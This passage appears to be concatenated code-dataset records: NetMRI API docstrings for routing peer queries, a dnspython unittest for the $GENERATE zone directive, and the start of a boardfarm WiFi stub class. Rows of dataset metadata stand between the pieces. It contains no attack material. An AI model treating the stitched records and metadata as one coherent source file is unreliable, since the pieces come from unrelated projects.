| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RoutingAreaID: If op_RoutingAreaID is specified, the field named in this input will be compared to the value in RoutingAreaID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RoutingAreaID must be specified if op_RoutingAreaID is specified.
:type val_f_RoutingAreaID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RoutingAreaID: If op_RoutingAreaID is specified, this value will be compared to the value in RoutingAreaID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RoutingAreaID must be specified if op_RoutingAreaID is specified.
:type val_c_RoutingAreaID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. The returned page will always include this record, although it may not be the first record on the page. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit is used to break the data up into pages, and the page containing the start record is returned. For example, if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name used by the NIOS GOTO feature to locate a row position within the records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field used by the NIOS GOTO feature to locate a row position within the records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
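
**Example**

A minimal sketch of a filtered call. The ``broker`` variable and the
constant values shown are illustrative assumptions, not values defined by
this API::

    results = broker.find(
        op_RPPeerType='=',
        val_c_RPPeerType='BGP',
        op_RPPeerStartTime='between',
        val_c_RPPeerStartTime='2020-01-01 00:00:00,2020-12-31 23:59:59',
        include=['device'],
        sort=['RPPeerStartTime'],
        dir=['desc'],
        start=0,
        limit=100,
    )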
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def peer_device(self, **kwargs):
"""The peer router with which this device exchanges routing data.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The peer router with which this device exchanges routing data.
:rtype : Device
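
**Example**

An illustrative sketch; the ``broker`` variable and the identifier value
are assumptions. The same calling pattern applies to the interface,
peer_interface, routing_area, infradevice, and device methods below::

    peer = broker.peer_device(DeviceRPPeerID=42)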
"""
return self.api_request(self._get_method_fullname("peer_device"), kwargs)
def interface(self, **kwargs):
"""The interface over which this peer relationship exists, if available.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The interface over which this peer relationship exists, if available.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def peer_interface(self, **kwargs):
"""The remote router's interface over which this peer relationship exists, if available.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The remote router's interface over which this peer relationship exists, if available.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("peer_interface"), kwargs)
def routing_area(self, **kwargs):
"""The routing area or autonomous system associated with this routing peer relationship.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The routing area or autonomous system associated with this routing peer relationship.
:rtype : RoutingArea
"""
return self.api_request(self._get_method_fullname("routing_area"), kwargs)
def infradevice(self, **kwargs):
"""The device from which this routing peer data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this routing peer data was collected.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def device(self, **kwargs):
"""The device from which this routing peer data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this routing peer data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
# tests/test_generate.py — from balabit-deps/balabit-os-6-dnspython (license: 0BSD)
] | null | null | null | # Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import sys
sys.path.insert(0, '../') # Force the local project to be *the* dns
import cStringIO
import filecmp
import os
import unittest
import dns.exception
import dns.rdata
import dns.rdataclass
import dns.rdatatype
import dns.rrset
import dns.zone
import pprint
pp = pprint.PrettyPrinter(indent=2)
import pdb
example_text = """$TTL 1h
$ORIGIN 0.0.192.IN-ADDR.ARPA.
$GENERATE 1-2 0 CNAME SERVER$.EXAMPLE.
"""
example_text1 = """$TTL 1h
$ORIGIN 0.0.192.IN-ADDR.ARPA.
$GENERATE 1-10 fooo$ CNAME $.0
"""
example_text2 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 3-5 foo$ A 10.0.0.$
"""
example_text3 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 4-8/2 foo$ A 10.0.0.$
"""
example_text4 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${-10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text5 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text6 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 wp-db${+10,2,d}.services.mozilla.com 0 CNAME SERVER.FOOBAR.
"""
example_text7 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-13 sync${-10}.db IN A 10.10.16.0
"""
example_text8 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-12 wp-db${-10,2,d} IN A 10.10.16.0
"""
example_text9 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 11-12 wp-db${-10,2,d} IN A 10.10.16.0
$GENERATE 11-13 sync${-10}.db IN A 10.10.16.0
"""
example_text10 = """$TTL 1h
@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
bar.foo 300 IN MX 0 blaz.foo
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
$GENERATE 27-28 $.2 PTR zlb${-26}.oob
"""
class GenerateTestCase(unittest.TestCase):
def testFromText(self):
def bad():
z = dns.zone.from_text(example_text, 'example.', relativize=True)
self.failUnlessRaises(dns.zone.NoSOA, bad)
def testFromText1(self):
def bad():
z = dns.zone.from_text(example_text1, 'example.', relativize=True)
self.failUnlessRaises(dns.zone.NoSOA, bad)
def testIterateAllRdatas2(self):
z = dns.zone.from_text(example_text2, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('foo3', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.3')),
(dns.name.from_text('foo4', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.4')),
(dns.name.from_text('foo5', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.5'))]
exl.sort()
self.failUnless(l == exl)
def testIterateAllRdatas3(self):
z = dns.zone.from_text(example_text3, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('foo4', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.4')),
(dns.name.from_text('foo6', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.6')),
(dns.name.from_text('foo8', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.8'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate1(self):
z = dns.zone.from_text(example_text4, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db01.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db02.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db03.services.mozilla.com', None),
0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate2(self):
z = dns.zone.from_text(example_text5, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db21.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db22.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db23.services.mozilla.com', None), 0L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.failUnless(l == exl)
def testGenerate3(self):
z = dns.zone.from_text(example_text6, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db21.services.mozilla.com', None), 0,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db22.services.mozilla.com', None), 0,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.')),
(dns.name.from_text('wp-db23.services.mozilla.com', None), 0,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.CNAME,
'SERVER.FOOBAR.'))]
exl.sort()
self.assertEqual(l, exl)
def testGenerate4(self):
z = dns.zone.from_text(example_text7, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('sync1.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync2.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync3.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0'))]
exl.sort()
self.assertEqual(l, exl)
def testGenerate6(self):
z = dns.zone.from_text(example_text9, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('wp-db01', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('wp-db02', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync1.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync2.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0')),
(dns.name.from_text('sync3.db', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.10.16.0'))]
exl.sort()
self.assertEqual(l, exl)
def testGenerate7(self):
z = dns.zone.from_text(example_text10, 'example.', relativize=True)
l = list(z.iterate_rdatas())
l.sort()
exl = [(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns1')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.NS,
'ns2')),
(dns.name.from_text('@', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.SOA,
'foo bar 1 2 3 4 5')),
(dns.name.from_text('bar.foo', None),
300,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.MX,
'0 blaz.foo')),
(dns.name.from_text('ns1', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('27.2', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.PTR,
'zlb1.oob')),
(dns.name.from_text('28.2', None), 3600,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.PTR,
'zlb2.oob'))]
exl.sort()
self.assertEqual(l, exl)
if __name__ == '__main__':
unittest.main()
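The testGenerate* cases above all follow one pattern: parse a fixture zone (the example_text* strings) whose records are, judging by the test names and the expanded records, produced by a $GENERATE-style directive, collect the rdatas, and compare the sorted result against a hand-built expected list. A minimal sketch of that pattern, assuming dnspython's public API (the zone text and names below are illustrative, not taken from the fixtures):

import dns.zone

# A tiny, hypothetical zone with explicit TTLs on every record.
zone_text = (
    "@ 3600 IN SOA foo bar 1 2 3 4 5\n"
    "@ 3600 IN NS ns1\n"
    "ns1 3600 IN A 10.0.0.1\n"
)

zone = dns.zone.from_text(zone_text, origin="example.", relativize=True)
# iterate_rdatas() yields (name, ttl, rdata) tuples -- exactly what the
# tests above collect, sort, and compare against their expected lists.
for name, ttl, rdata in sorted(zone.iterate_rdatas()):
    print(name, ttl, rdata)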
| 39.652 | 78 | 0.487239 | 2,516 | 19,826 | 3.762719 | 0.082671 | 0.131826 | 0.084821 | 0.115665 | 0.860251 | 0.860251 | 0.853385 | 0.823915 | 0.823915 | 0.816943 | 0 | 0.089838 | 0.379048 | 19,826 | 499 | 79 | 39.731463 | 0.679149 | 0.0402 | 0 | 0.826087 | 0 | 0.011442 | 0.170778 | 0.021091 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.029748 | null | null | 0.004577 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43cc35ddea884281ca97bb7f39e378014484013c | 11,324 | py | Python | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 17 | 2018-04-19T08:35:47.000Z | 2021-11-01T01:38:33.000Z | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 190 | 2018-04-19T07:00:18.000Z | 2022-02-11T01:42:51.000Z | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 30 | 2018-04-12T01:49:21.000Z | 2022-02-11T14:53:19.000Z | class WiFiStub:
"""Wifi_stub."""
apply_changes_no_delay = True
# The above variable can tweak the behavior of the below functions
# If it is set to True, it will apply the changes after setting wifi parameters
# If it is set to False, it will not save any changes & apply_changes() will be skipped
def enable_wifi(self, *args, **kwargs):
"""Stub for enabling wifi on CM.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_ssid(self, *args, **kwargs):
"""Stub to set SSID.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_broadcast(self, *args, **kwargs):
"""Stub to set broadcast.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_security(self, *args, **kwargs):
"""Stub to set security.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_password(self, *args, **kwargs):
"""Stub to set password.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def enable_channel_utilization(self, *args, **kwargs):
"""Stub to enable channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_operating_mode(self, *args, **kwargs):
"""Stub to set operating mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_bandwidth(self, *args, **kwargs):
"""Stub to set bandwidth.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_channel_number(self, *args, **kwargs):
"""Stub to enable channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_wifi_enabled(self, *args, **kwargs):
"""Stub to get WiFi enabled.
:param self: self object
:type self: object
:param args: arguments to be used if any
